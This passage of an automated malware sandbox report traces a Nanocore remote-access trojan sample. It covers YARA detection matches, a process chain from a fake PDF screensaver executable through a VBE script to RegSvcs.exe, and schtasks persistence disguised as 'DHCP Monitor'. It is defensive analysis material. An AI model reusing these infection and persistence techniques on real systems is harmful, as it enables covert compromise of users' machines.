      Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe, Code function: 2_2_0037F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_0037F122
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe, Code function: String function: 00330DC0 appears 46 times
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe, Code function: String function: 0032FD60 appears 40 times
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe, Code function: String function: 00CDEC50 appears 56 times
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe, Code function: String function: 00CDEB78 appears 39 times
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe, Code function: String function: 00CDF5F0 appears 31 times
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe, Code function: 0_2_00CC6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00CC6FAA
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameautoruns.exeL, vs 026910003102350.pdf.scr.exe
      Source: 026910003102350.pdf.scr.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, File created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A
      Source: classification engine, Classification label: mal100.troj.evad.winEXE@43/44@4/2
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe, File read: C:\Windows\win.ini
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe, Code function: 0_2_00CC6C74 GetLastError,FormatMessageW,0_2_00CC6C74
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe, Code function: 0_2_00CDA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00CDA6C2
      Source: unknown, Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, File created: C:\Program Files (x86)\DHCP Monitor
      Source: 026910003102350.pdf.scr.exe, ReversingLabs: Detection: 46%
      Source: 026910003102350.pdf.scr.exe, Virustotal: Detection: 45%
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe, File read: C:\Users\user\Desktop\026910003102350.pdf.scr.exe
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknown, Process created: C:\Users\user\Desktop\026910003102350.pdf.scr.exe C:\Users\user\Desktop\026910003102350.pdf.scr.exe
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe, Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
      Source: C:\Windows\SysWOW64\wscript.exe, Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe, Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp
      Source: unknown, Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp
      Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown, Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbeJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xlsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037194F AdjustTokenPrivileges,CloseHandle,2_2_0037194F
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00371F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00371F53
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeFile created: C:\Users\user\AppData\Local\temp\Folder8_410Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00394089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,2_2_00394089
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00385B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,2_2_00385B27
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0039AFDB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,2_2_0039AFDB
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5648:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1648:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1880:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5092:120:WilError_01
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{d95e5ad5-6193-4689-a919-7befded6bfa5}
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCommand line argument: sfxname0_2_00CDDF1E
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCommand line argument: sfxstime0_2_00CDDF1E
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCommand line argument: STARTDLG0_2_00CDDF1E
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeFile written: C:\Users\user\AppData\Local\Temp\Folder8_410\laaa.iniJump to behavior
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: 026910003102350.pdf.scr.exeStatic file information: File size 1064658 > 1048576
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: 026910003102350.pdf.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 026910003102350.pdf.scr.exe
      Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
      Source: 026910003102350.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: 026910003102350.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: 026910003102350.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: 026910003102350.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: 026910003102350.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

      Data Obfuscation

      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDF640 push ecx; ret 0_2_00CDF653
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDEB78 push eax; ret 0_2_00CDEB96
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00360332 push edi; ret 2_2_00360333
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00330E06 push ecx; ret 2_2_00330E19
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0032DBFA push cs; iretd 2_2_0032DBFD
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0032DC00 push eax; iretd 2_2_0032DC01
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00315D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_00315D78
      Source: 026910003102350.pdf.scr.exeStatic PE information: section name: .didat
      Source: itugx.exe.0.drStatic PE information: real checksum: 0xe50ad should be: 0xe9063
      Source: 026910003102350.pdf.scr.exeStatic PE information: real checksum: 0x0 should be: 0x1079dd
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeFile created: C:\Users\user\AppData\Local\Temp\Folder8_410\__tmp_rar_sfx_access_check_5500781Jump to behavior
